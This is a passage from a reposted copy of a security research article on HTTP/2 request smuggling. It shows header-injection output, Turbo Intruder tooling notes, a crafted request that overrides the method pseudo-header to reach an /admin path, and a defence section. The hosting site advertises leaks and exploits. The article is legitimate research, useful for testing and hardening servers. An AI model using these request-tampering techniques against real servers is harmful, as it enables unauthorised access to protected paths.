200 OK<br/>Content-Type: text/html; charset=utf-8<br/>Content-Length: 3705<br/>Request-Id: 1-602d2c4b-7c9a1f0f7 <span class="orangeCode">poison: x</span><br/></code></p><p>Many front-ends don’t sort incoming headers, so you’ll find that by moving the space-header around, you can tamper with different internal and external headers.</p><a name="essential-information"></a><h2 id='26_essential-information' id="essential">Essential Information</h2><p>Before we wrap up, let’s take a look at some of the pitfalls and challenges you’re likely to encounter when exploiting HTTP/2.</p><a name="hidden-http-2"></a><h3 id='27_hidden-http-2' id="hidden">Hidden HTTP/2</h3><p>As HTTP/2 and HTTP/1 share the same TCP port, clients need some way to determine which protocol to speak. When using TLS, most clients default to HTTP/1, and only use HTTP/2 if the server explicitly advertises support for HTTP/2 via the ALPN field during the TLS handshake. Some servers that support HTTP/2 forget to advertise this fact, leading to clients only speaking HTTP/1 with them, and hiding valuable attack surface.</p><p>Fortunately, this is easy to detect – simply ignore the ALPN and try to send an HTTP/2 request regardless. You can scan for this scenario using HTTP Request Smuggler, <a rel="nofollow noopener" target="_blank" href="https://portswigger.net/burp/vulnerability-scanner">Burp Scanner</a>, or even curl:</p><p><code>curl --http2 --http2-prior-knowledge https://github.ford.com/</code> </p><a name="connection"></a><h3 id='28_connection' id="connection">Connection </h3><p>HTTP/2 puts a lot of effort into supporting multiple requests over a single connection. However, there are a couple of common implementation quirks to be wary of.</p><p>Some servers treat the first request on each connection differently, which can lead to vulnerabilities appearing intermittent or even being missed entirely. On other servers, sometimes a request will corrupt a connection without causing the server to tear it down, silently influencing how all subsequent requests get processed.</p><p>If you observe either of these problems, you can mitigate them using the ‘Enable HTTP/2 connection reuse’ option in Burp Repeater, and the requestsPerConnection setting in Turbo Intruder.</p><a name="tooling"></a><h3 id='29_tooling' id="tooling">Tooling</h3><p>This research was only possible due to a significant investment in developing an offensive HTTP/2 toolkit. HTTP/2’s binary format means you can’t use classic general-purpose tools like netcat and openssl. HTTP/2’s complexity means you can’t easily implement your own client, so you’ll need to use a library. Existing libraries don’t give users the essential ability to send malformed requests. This rules out curl, too.</p><p>I started this research by coding my own stripped-down, open-source HTTP/2 stack from scratch, and integrating it into <a rel="nofollow noopener" target="_blank" href="https://github.com/PortSwigger/turbo-intruder">Turbo Intruder</a>.To invoke it, change engine=Engine.THREADED to engine=Engine.HTTP2. It takes HTTP/1.1-formatted requests as input, then rewrites them as HTTP/2. During the rewrite, it performs a few character mappings on the headers to ensure all the techniques used in this presentation are possible:</p><p><code>^ -> r<br/>~ -> n<br/>` -> :<br/></code></p><p>You can also override pseudo-headers by specifying them as fake HTTP/1.1 headers. Here’s an example using the Apache vulnerability mentioned earlier:</p><p><code>GET /fakepath HTTP/1.1<br/>Host: example.com<br/>:method: GET /admin HTTP/1.1</code></p><p>Turbo Intruder’s HTTP/2 stack is not currently very tolerant of unusual server behavior. If you find it doesn’t work on a target, I’d suggest trying Burp Suite’s native HTTP/2 stack. This is more battle-tested, and you can invoke it from Turbo Intruder via Engine.BURP2.</p><p>To help you scan for these vulnerabilities, I’ve released a major update to HTTP Request Smuggler. This tool found all the case studies mentioned in this paper. I’ve also made sure that Burp Suite’s scanner can detect these vulnerabilities. Please note that many of these features rely on new APIs introduced in Burp Suite Pro/Community 2020.8. The exception is Turbo Intruder’s HTTP/2 stack, which can even be used as a command-line tool or library.</p><a name="burp-suite"></a><h3 id='30_burp-suite' id="burpsuite">Burp Suite</h3><p>I’ve also helped integrate support for HTTP/2-exclusive attacks directly into Burp Suite. Burp Suite has had basic support for H/2 for around a year already, implemented via an H/1 style view that performs essential normalization (like lowercasing header-names) to avoid a valid H/1 request being converted into an invalid H/2 request. </p><p>The H/1-style view is convenient for regular attacks where the protocol isn’t relevant, so we’ve kept it roughly as-is, but taken steps to make the normalization visible.</p><p>However, many H/2-exclusive attacks can’t be expressed with H/1-style syntax, so we’ve added support for these in Burp Suite 2021.8 via the Inspector sidebar. The Inspector view now accurately represents H/2 requests including pseudo-headers, and lets you perform advanced attacks like using newlines in headers, or spaces in the path. If a request can’t be represented at all using H/1 style syntax, we declare it ‘kettled’ (not my idea!) and hide the H/1 view.</p><p>For further information, please refer to <a rel="nofollow noopener" target="_blank" href="https://portswigger.net/burp/releases/professional-community-2021-8">Burp’s HTTP/2 release notes</a> and <a rel="nofollow noopener" target="_blank" href="https://portswigger.net/burp/documentation/desktop/http2/index.html">HTTP/2 documentation</a>.</p><a name="defence"></a><h3 id='31_defence' id="defence">Defence</h3><p>If you’re setting up a web application, avoid HTTP/2 downgrading – it’s the root cause of most of these vulnerabilities. Instead, use HTTP/2 end to end.</p><p>If you’re coding an HTTP/2 server, especially one that supports downgrading, enforce the charset limitations present in HTTP/1 – reject requests that contain newlines in headers, colons in header names, spaces in the request method, etc. Also, be aware that the specification isn’t always explicit about where vulnerabilities may arise. Certain unmarked requirements, if skipped, will leave you with a functional server with a critical vulnerability. There are probably some hardening opportunities in the RFC, too.</p><p>Web developers are advised to shed assumptions inherited from HTTP/1. It’s historically been possible to get away without performing extensive validation on certain user inputs like the request method, but HTTP/2 changes this.</p><a name="further-reading"></a><h3 id='32_further-reading' id="reading">Further Reading</h3><p>We’ve launched a <a rel="nofollow noopener" target="_blank" href="https://portswigger.net/web-security/request-smuggling/advanced">Web Security Academy</a> topic on this research, with multiple labs to help you consolidate your understanding and gain practical experience exploiting real websites.</p><p>For an alternative perspective on HTTP/2 powered request smuggling, I recommend Emil Lerner’s <a rel="nofollow noopener" target="_blank" href="https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/">HTTP Request Smuggling via Higher HTTP Versions</a>.</p><p>For an alternative explanation of HTTP Response Queue Poisoning, check out @defparam’s <a rel="nofollow noopener" target="_blank" href="https://youtu.be/3tpnuzFLU8g">Practical Attacks Using HTTP Request Smuggling</a></p><a name="conclusion"></a><h2 id='33_conclusion' id="conclusion">Conclusion</h2><p>We’ve seen that HTTP/2’s complexity has contributed to server implementation shortcuts, inadequate offensive tooling, and poor risk awareness.</p><p>Through novel tooling and research, I’ve shown that many websites suffer from serious HTTP/2 request smuggling vulnerabilities thanks to widespread HTTP/2 downgrading. I’ve also shown that, aside from request smuggling, HTTP/2’s power and flexibility enable a broad range of other attacks not possible with HTTP/1.</p><p>Finally, I’ve introduced techniques that make request tunneling practical to detect and exploit, particularly in the presence of HTTP/2.</p><p><a rel="nofollow noopener" target="_blank" href="https://portswigger.net/research/articles" class="chevron-before">Back to all articles</a></p></div><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4922338515485836" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-format="fluid" data-ad-layout-key="-5p+c7+2u-1j+9q" data-ad-client="ca-pub-4922338515485836" data-ad-slot="3086604785"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> <ul class="nav mb-4 list-shares"> <li class="mr-2"> <a class="facebook" href="https://www.facebook.com/sharer/sharer.php?u=https://system32.ink/http2/" rel="nofollow" target="_blank"> <svg class="svg-5" fill="#fff" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"> <path d="M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z"/> </svg> </a> </li> <li class="mr-2"> <a class="twitter" href="https://twitter.com/home?status=https://system32.ink/http2/" rel="nofollow" target="_blank"> <svg class="svg-5" fill="#fff" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"> <path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z"/> </svg> </a> </li> <li class="mr-2"> <a class="pinterest" href="https://pinterest.com/pin/create/button/?url=https://system32.ink/http2/" rel="nofollow" target="_blank"> <svg class="svg-5" fill="#fff" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512"> <path d="M204 6.5C101.4 6.5 0 74.9 0 185.6 0 256 39.6 296 63.6 296c9.9 0 15.6-27.6 15.6-35.4 0-9.3-23.7-29.1-23.7-67.8 0-80.4 61.2-137.4 140.4-137.4 68.1 0 118.5 38.7 118.5 109.8 0 53.1-21.3 152.7-90.3 152.7-24.9 0-46.2-18-46.2-43.8 0-37.8 26.4-74.4 26.4-113.4 0-66.2-93.9-54.2-93.9 25.8 0 16.8 2.1 35.4 9.6 50.7-13.8 59.4-42 147.9-42 209.1 0 18.9 2.7 37.5 4.5 56.4 3.4 3.8 1.7 3.4 6.9 1.5 50.4-69 48.6-82.5 71.4-172.8 12.3 23.4 44.1 36 69.3 36 106.2 0 153.9-103.5 153.9-196.8C384 71.3 298.2 6.5 204 6.5z"/> </svg> </a> </li> <li class="mr-2"> <a class="linkedin" href="https://www.linkedin.com/shareArticle?mini=true&url=https://system32.ink/http2/&title=HTTP/2: The Sequel is Always Worse&summary=&source=" rel="nofollow" target="_blank"> <svg class="svg-5" fill="#fff" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"> <path d="M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z"/> </svg> </a> </li> </ul> </article> <section class="bg-white shadow-sm mx-auto" style="max-width: 900px;"><div class="pCmnts" id="comment"><input class="cmSh fixi hidden" id="forComments" type="checkbox"><input class="cmAl hidden" id="forAllCm" type="checkbox"><div class="cmShw text-center mb-3"><label aria-label='Leave me a Comments ' class="cmBtn button ln" for="forComments"><span>Leave me a Comments </span></label></div><section class="cm cmBr fixL" data-embed="true" data-num-comments="" id="comments"> <div class="cmBri"> <div class="cmBrs fixLs"> <div class="cmH fixH"> <h3 class="h5 title"> Comments</h3> <div class="cmI cl"> <label aria-label="" class="s" data-new="Newest" data-text="Oldest" for="forAllCm"></label> <label aria-label="Close" class="c" for="forComments"></label> </div> </div> <div class="cmC"> <div class="cmCn"> <ol class="cmHl mt-3" id="cmHolder"> </ol> </div> <div class="cmAd hidden" id="addCm"> <div aria-label="Leave Comments" class="cmBtn button ln" role="button"> Leave Comments </div> </div> <script>var comment = true;</script> <div class="cmFrm"> <div id="commentForm"> <div id="respond" class="comment-respond"> <h3 id="reply-title" class="comment-reply-title"> <small><a rel="nofollow" id="cancel-comment-reply-link" href="/http2/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://system32.ink/comments/" method="post" id="commentform" class="comment-form my-class" novalidate><p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p><div class="form-group"><textarea id="comment" class="form-control" name="comment" cols="45" rows="4" placeholder="Leave me a Comments" aria-required="true"></textarea></div><div class="row"><div class="col-12 col-sm-6 form-group"><input class="form-control" id="author" name="author" type="text" placeholder="Name" size="30" /></div><div class="col-12 col-sm-6 form-group"><input class="form-control" id="email" name="email" type="text" placeholder="Email" size="30" /></div></div><p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes"/> <label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p><p class="form-submit"><div class="form-group text-right"><input name="submit" type="submit" class="btn btn-primary" class="submit" value="Send Comment"/></div> <input type='hidden' name='comment_post_ID' value='2283' id='comment_post_ID'/><input type='hidden' name='comment_parent' id='comment_parent' value='0'/></p></form> </div> </div> </div></div> </div> </div> <label class="fCls" for="forComments"></label></section></div></section> <span style="display:none"><style>#breadcrumbiblog1{padding:5px 5px 5px 0;margin:0 0 15px 0;font-size:90%;line-height:1.4em;border-bottom:3px double #eee}#breadcrumbiblog{background:#fff;line-height:1.2em;width:auto;overflow:hidden;margin:0;padding:10px 0;border-top:0 solid #dedede;border-bottom:0 solid #dedede;font-size:80%;color:#888;font-weight:400;text-overflow:ellipsis;-webkit-text-overflow:ellipsis;white-space:nowrap}#breadcrumbiblog a{display:inline-block;text-decoration:none;transition:all .3s ease-in-out;color:#666;font-weight:400}#breadcrumbiblog a:hover{color:#11589D}#breadcrumbiblog svg{width:16px;height:16px;vertical-align:-4px}#breadcrumbiblog svg path{fill:#666}}</style><div id="breadcrumbiblog"><ul id="breadcrumb" class="pb-3 breadcrumb " itemscope itemtype="http://schema.org/BreadcrumbList" ><li class="breadcrumb-item home" itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a href="https://system32.ink/" itemprop="item"><span itemprop="name">Home</span></a><span itemprop="position" content="1" ></span></li> <li class="breadcrumb-item home" itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a href="https://system32.ink/news/" itemprop="item"><span itemprop="name">News</span></a><span itemprop="position" content="2" ></span></li> <li class="breadcrumb-item active">HTTP/2: The Sequel is Always Worse</li></ul></div></span> </main> <aside id="secondary" class=" col-12 col-lg-3 widget-area"> <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4922338515485836" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-format="fluid" data-ad-layout-key="-5p+c7+2u-1j+9q" data-ad-client="ca-pub-4922338515485836" data-ad-slot="3086604785"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <section class="bg-white border rounded shadow-sm pb-3 pt-3 px-2 px-md-3 mt-3 m-2"> <div class="d-flex align-items-baseline justify-content-between "> <h2 class="h5 font-weight-semibold m-0 p-0 mb-3 cate-title">Latest Blog</h2> </div> <div class="row"> <div class="col-12 col-sm-6 col-lg-4 mb-4 "> <a class="embed-responsive embed-responsive-16by9 bg-cover d-block" style="background-image: url(https://system32.ink/storage/2024/05/1716627202_callout_zakhar_fedotkin_114px.png); box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.15);" href="https://system32.ink/introducing-signsaboteur-forge-signed-web-tokens-with-ease/"> <div class="d-flex align-items-end p-3 position-absolute" style="background-color: rgba(0, 0, 0, 0.5); top: 0; bottom: 0; left: 0; right: 0;"> <h3 class="text-white mb-0" style="font-size: 0.875rem;">Introducing SignSaboteur: forge signed web tokens with ease</h3> </div> </a></div> <div class="col-12 col-sm-6 col-lg-4 mb-4 "> <a class="embed-responsive embed-responsive-16by9 bg-cover d-block" style="background-image: url(https://system32.ink/storage/2024/05/boost_logo-250x86.png); box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.15);" href="https://system32.ink/boost-security-audit/"> <div class="d-flex align-items-end p-3 position-absolute" style="background-color: rgba(0, 0, 0, 0.5); top: 0; bottom: 0; left: 0; right: 0;"> <h3 class="text-white mb-0" style="font-size: 0.875rem;">Shielder – Boost Security Audit</h3> </div> </a></div> <div class="col-12 col-sm-6 col-lg-4 mb-4 "> <a class="embed-responsive embed-responsive-16by9 bg-cover d-block" style="background-image: url(https://system32.ink/storage/2024/05/Blog-What-is-vulnerability-management-250x141.png); box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.15);" href="https://system32.ink/what-is-vulnerability-management/"> <div class="d-flex align-items-end p-3 position-absolute" style="background-color: rgba(0, 0, 0, 0.5); top: 0; bottom: 0; left: 0; right: 0;"> <h3 class="text-white mb-0" style="font-size: 0.875rem;">What is vulnerability management? And how can ProjectDiscovery help?</h3> </div> </a></div> <div class="col-12 col-sm-6 col-lg-4 mb-4 "> <a class="embed-responsive embed-responsive-16by9 bg-cover d-block" style="background-image: url(https://system32.ink/storage/2024/05/1716179265_32_business-email-scam_02-250x141.png); box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.15);" href="https://system32.ink/online-scams-anyone-can-fall-for-scams/"> <div class="d-flex align-items-end p-3 position-absolute" style="background-color: rgba(0, 0, 0, 0.5); top: 0; bottom: 0; left: 0; right: 0;"> <h3 class="text-white mb-0" style="font-size: 0.875rem;">Online Scams: Anyone Can Fall for Scams</h3> </div> </a></div> <div class="col-12 col-sm-6 col-lg-4 mb-4 "> <a class="embed-responsive embed-responsive-16by9 bg-cover d-block" style="background-image: url(https://system32.ink/storage/2024/05/google-ssrf-info2.webp.webp-250x141.webp); box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.15);" href="https://system32.ink/google-has-ssrf-now/"> <div class="d-flex align-items-end p-3 position-absolute" style="background-color: rgba(0, 0, 0, 0.5); top: 0; bottom: 0; left: 0; right: 0;"> <h3 class="text-white mb-0" style="font-size: 0.875rem;">Google has SSRF – now</h3> </div> </a></div> <div class="col-12 col-sm-6 col-lg-4 mb-4 "> <a class="embed-responsive embed-responsive-16by9 bg-cover d-block" style="background-image: url(https://system32.ink/storage/2024/05/19_bank-shield_02-250x141.png); box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.15);" href="https://system32.ink/vipersoftx-uses-deep-learning-based-tesseract-to-exfiltrate-information/"> <div class="d-flex align-items-end p-3 position-absolute" style="background-color: rgba(0, 0, 0, 0.5); top: 0; bottom: 0; left: 0; right: 0;"> <h3 class="text-white mb-0" style="font-size: 0.875rem;">ViperSoftX Uses Deep Learning-based Tesseract to Exfiltrate Information</h3> </div> </a></div> </div> </section> <section class="rounded shadow-sm pt-2 px-2 px-md-2 mb-2"><h2 class="h5 font-weight-semibold mb-3"><span class="border-bottom-2 border-secondary d-inline-block pb-1">Password,File Download,etc. Issue :</span></h2><div style="clear:both"></div> <div class="textwidget"><p><em>Dm On Telegram: <a title="Telegram" href="https://telegram.me/MCracker2002" target="_blank" rel="noopener">https://telegram.me/MCracker2002</a></em></p></div> </section> <section class="bg-white border rounded shadow-sm pt-3 px-2 px-md-3 mb-3"> <header class="d-flex align-items-end mb-3"> <h2 class="h5 font-weight-semibold mb-0"> <a class="text-body" href="https://system32.ink">List Categorie</a> </h2> <a class="btn btn-primary btn-sm ml-auto" href="https://system32.ink" >Show More</a> </header> <div class="row"> <div class="col-6 mb-3"> <a class="small text-truncate d-block" href="https://system32.ink/category/cyber-sec/" title="Cyber sec">Cyber sec</a> </div> <div class="col-6 mb-3"> <a class="small text-truncate d-block" href="https://system32.ink/category/database/" title="Database">Database</a> </div> <div class="col-6 mb-3"> <a class="small text-truncate d-block" href="https://system32.ink/category/exploits-pocs/" title="Exploits And POCs">Exploits And POCs</a> </div> <div class="col-6 mb-3"> <a class="small text-truncate d-block" href="https://system32.ink/category/malicious-scripts/" title="Malicious Scripts">Malicious Scripts</a> </div> <div class="col-6 mb-3"> <a class="small text-truncate d-block" href="https://system32.ink/category/malwares/" title="Malwares">Malwares</a> </div> <div class="col-6 mb-3"> <a class="small text-truncate d-block" href="https://system32.ink/category/softwares/" title="Softwares">Softwares</a> </div> <div class="col-6 mb-3"> <a class="small text-truncate d-block" href="https://system32.ink/category/tools/" title="Tools">Tools</a> </div> </div> </section> </aside> </div></div><footer class="site-footer rounded shadow-none border-top "> <div class="secIn"> <div class="fotIn"> <div class="section" id="footer-widget-1"> <div class="widget HTML" > <p class="abtD">System32.ink is a completed free website to share leaks,exploits and premium tool</p> </div> </div> <div class="section" id="footer-widget-2"> <div class="widget LinkList" > <h3 class="title h5"> Websites </h3> <div class="widget-content"> <ul> <li id="menu-item-586" class="menu-item menu-item-type-post_type_archive menu-item-object-news menu-item-586"><a href="https://system32.ink/news/">All News</a></li><li id="menu-item-587" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-587"><a href="https://crackcodes.in">Crackcodes</a></li><li id="menu-item-588" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-588"><a href="https://promcracker.me">About me</a></li><li id="menu-item-589" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-589"><a href="https://mcracker.org">Old</a></li> </ul> </div> </div> </div> <div class="section" id="footer-widget-3"> <div class="widget LinkList" > <h3 class="title h5"> </h3> <div class="widget-content"> <ul> <li class="page_item page-item-3"><a href="https://system32.ink/privacy-policy/">Privacy Policy</a></li> </ul> </div> </div> </div> <div class="section" id="footer-widget-4"> <div class="widget LinkList" > <h3 class="title h5">Imp.</h3> <div class="widget-content"> <ul> <li id="menu-item-46" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-46"><a href="https://system32.ink">Home</a></li><li id="menu-item-47" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-47"><a rel="privacy-policy" href="https://system32.ink/privacy-policy/">Privacy Policy</a></li> </ul> </div> </div> </div> </div> <div class="container "> <div class="d-flex align-items-center justify-content-center mb-2 socials"> <span class="border-top d-block flex-grow-1 ml-1"></span> <a href="https://www.facebook.com/Mynk0x00" target="_blank" rel="nofollow" aria-label="https://www.facebook.com/Mynk0x00"><svg role="img" width="22" height="22" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="var(--color_svg)" d="M23.9981 11.9991C23.9981 5.37216 18.626 0 11.9991 0C5.37216 0 0 5.37216 0 11.9991C0 17.9882 4.38789 22.9522 10.1242 23.8524V15.4676H7.07758V11.9991H10.1242V9.35553C10.1242 6.34826 11.9156 4.68714 14.6564 4.68714C15.9692 4.68714 17.3424 4.92149 17.3424 4.92149V7.87439H15.8294C14.3388 7.87439 13.8739 8.79933 13.8739 9.74824V11.9991H17.2018L16.6698 15.4676H13.8739V23.8524C19.6103 22.9522 23.9981 17.9882 23.9981 11.9991Z"></path></svg></a> <a href="https://twitter.com/Mynk0x00" target="_blank" rel="nofollow" aria-label="https://twitter.com/Mynk0x00"><svg role="img" width="22" height="22" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="var(--color_svg)" d="M23.954 4.569c-.885.389-1.83.654-2.825.775 1.014-.611 1.794-1.574 2.163-2.723-.951.555-2.005.959-3.127 1.184-.896-.959-2.173-1.559-3.591-1.559-2.717 0-4.92 2.203-4.92 4.917 0 .39.045.765.127 1.124C7.691 8.094 4.066 6.13 1.64 3.161c-.427.722-.666 1.561-.666 2.475 0 1.71.87 3.213 2.188 4.096-.807-.026-1.566-.248-2.228-.616v.061c0 2.385 1.693 4.374 3.946 4.827-.413.111-.849.171-1.296.171-.314 0-.615-.03-.916-.086.631 1.953 2.445 3.377 4.604 3.417-1.68 1.319-3.809 2.105-6.102 2.105-.39 0-.779-.023-1.17-.067 2.189 1.394 4.768 2.209 7.557 2.209 9.054 0 13.999-7.496 13.999-13.986 0-.209 0-.42-.015-.63.961-.689 1.8-1.56 2.46-2.548l-.047-.02z"></path></svg></a> <a href="https://www.instagram.com/Mynk0x00" target="_blank" rel="nofollow" aria-label="https://www.instagram.com/Mynk0x00"><svg role="img" width="22" height="22" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="var(--color_svg)" d="M12 0C8.74 0 8.333.015 7.053.072 5.775.132 4.905.333 4.14.63c-.789.306-1.459.717-2.126 1.384S.935 3.35.63 4.14C.333 4.905.131 5.775.072 7.053.012 8.333 0 8.74 0 12s.015 3.667.072 4.947c.06 1.277.261 2.148.558 2.913.306.788.717 1.459 1.384 2.126.667.666 1.336 1.079 2.126 1.384.766.296 1.636.499 2.913.558C8.333 23.988 8.74 24 12 24s3.667-.015 4.947-.072c1.277-.06 2.148-.262 2.913-.558.788-.306 1.459-.718 2.126-1.384.666-.667 1.079-1.335 1.384-2.126.296-.765.499-1.636.558-2.913.06-1.28.072-1.687.072-4.947s-.015-3.667-.072-4.947c-.06-1.277-.262-2.149-.558-2.913-.306-.789-.718-1.459-1.384-2.126C21.319 1.347 20.651.935 19.86.63c-.765-.297-1.636-.499-2.913-.558C15.667.012 15.26 0 12 0zm0 2.16c3.203 0 3.585.016 4.85.071 1.17.055 1.805.249 2.227.415.562.217.96.477 1.382.896.419.42.679.819.896 1.381.164.422.36 1.057.413 2.227.057 1.266.07 1.646.07 4.85s-.015 3.585-.074 4.85c-.061 1.17-.256 1.805-.421 2.227-.224.562-.479.96-.899 1.382-.419.419-.824.679-1.38.896-.42.164-1.065.36-2.235.413-1.274.057-1.649.07-4.859.07-3.211 0-3.586-.015-4.859-.074-1.171-.061-1.816-.256-2.236-.421-.569-.224-.96-.479-1.379-.899-.421-.419-.69-.824-.9-1.38-.165-.42-.359-1.065-.42-2.235-.045-1.26-.061-1.649-.061-4.844 0-3.196.016-3.586.061-4.861.061-1.17.255-1.814.42-2.234.21-.57.479-.96.9-1.381.419-.419.81-.689 1.379-.898.42-.166 1.051-.361 2.221-.421 1.275-.045 1.65-.06 4.859-.06l.045.03zm0 3.678c-3.405 0-6.162 2.76-6.162 6.162 0 3.405 2.76 6.162 6.162 6.162 3.405 0 6.162-2.76 6.162-6.162 0-3.405-2.76-6.162-6.162-6.162zM12 16c-2.21 0-4-1.79-4-4s1.79-4 4-4 4 1.79 4 4-1.79 4-4 4zm7.846-10.405c0 .795-.646 1.44-1.44 1.44-.795 0-1.44-.646-1.44-1.44 0-.794.646-1.439 1.44-1.439.793-.001 1.44.645 1.44 1.439z"></path></svg></a> <a href="https://telegram.me/crackcodes" target="_blank" rel="nofollow" aria-label="https://telegram.me/crackcodes"><svg role="img" width="22" height="22" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill="var(--color_svg)" d="M23.91 3.79L20.3 20.84c-.25 1.21-.98 1.5-2 .94l-5.5-4.07-2.66 2.57c-.3.3-.55.56-1.1.56-.72 0-.6-.27-.84-.95L6.3 13.7l-5.45-1.7c-1.18-.35-1.19-1.16.26-1.75l21.26-8.2c.97-.43 1.9.24 1.53 1.73z"></path></svg></a> <span class="border-top d-block flex-grow-1 mr-1"></span> </div> </div> <div class="cdtIn section" id="credit-widget"> <div class="widget HTML" > <div class="fotCd"> <p class="copyright"><a href="https://system32.ink">System32 </a> - © <script type="text/javascript">var creditsyear = new Date();document.write(creditsyear.getFullYear());</script> All rights reserved</p> </div> </div> <div class="widget TextList" > <div class="toTop tTop" data-text="UP" onclick="window.scrollTo({top: 0});"> <svg class="line" viewBox="0 0 24 24"> <g transform="translate(12.000000, 12.000000) rotate(-180.000000) translate(-12.000000, -12.000000) translate(5.000000, 8.500000)"> <path d="M14,0 C14,0 9.856,7 7,7 C4.145,7 0,0 0,0"></path> </g> </svg> </div> </div> </div> </div></footer><style>.site-footer .socials a { background-color: var(--color_rgb1) !important;; }</style><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><script> $(document).ready(function () { setTimeout(function () { $('a[href]#no-link').each(function () { var href = this.href; $(this).removeAttr('href').css('cursor', 'pointer').click(function () { if (href.toLowerCase().indexOf("#") >= 0) { } else { //window.open(href, '_top'); window.location.href = href; } }); }); }, 500); }); </script><script> $('#usermember').on('click', function(e) { $('.user-header-menu').toggleClass("open"); e.preventDefault(); }); </script><div id="uthwfiretrssjumbtcvfveddtafzdxpukyvvmgpvypbqztczrvgro" class="uthwfiretrssjumbtcvfveddtafzdxpukyvvmgpvypbqztczrvgro"> <div class="ruhpsrnvdfhfvhlvvubmwdguhcwmvreutvzeufntryturynhnazrvgro yxknrizzbgcfbpzemrwxndxakldbecwefodelbhrvctmzffvmedntzbirfpgqxjaqnrlnzjwyuqmqrvgrorvgro" id="ruhpsrnvdfhfvhlvvubmwdguhcwmvreutvzeufntryturynhnazrvgro"> <div class="rlnsavavsvsfhhumvjawnzmritvlpunltgjwtgxnstfahrjehvoyzrvgro" id="rlnsavavsvsfhhumvjawnzmritvlpunltgjwtgxnstfahrjehvoyzrvgro"> <div class="efvkrertdehobgtnudfiawdhzguxohjztgjtcgxpwgrsmsbmzjslyzzrvgro theme1"> <div class="rlnsavavsvsfhhumvjawnzmritvlpunltgjwtgxnstfahrjehvoyzrvgro"> <div class="bkcujnvmxfunwfyyjzsohdqkhutngsfldazlgmtfotwrrrzalziyzrvgro"> <img class="rxnqsnvntefucfmmnhzwjfyskezrjzogluevfdamnfleujiyddeyzrvgro" src="https://system32.ink/core/modules/9af74586b7/assets/img/icon.png" alt="Ads Blocker Image Powered by Code Help Pro"> </div> <h4 class="adblock_title">AdBlocker Detected!!!</h4> <div class="adblock_subtitle"><p>We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.</p></div> <div > <a class="adzvvwznyztlmuorckpinwvrmmwyvtqkqzyjelrrbjdofdicbzadhdtlzmwnpczshzicndyqrvgrorvgro" id="zgxumccwxuwnkzcnzlqxvyzxhqhfndddjfzdfkxytlutngdxqwnjpakmuloqhvzhmqmtuyqrvgrorvgro">Close</a> </div> </div> </div> </div> </div> </div><script>var _0xc65e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe38c(d,e,f){var g=_0xc65e[2][_0xc65e[1]](_0xc65e[0]);var h=g[_0xc65e[3]](0,e);var 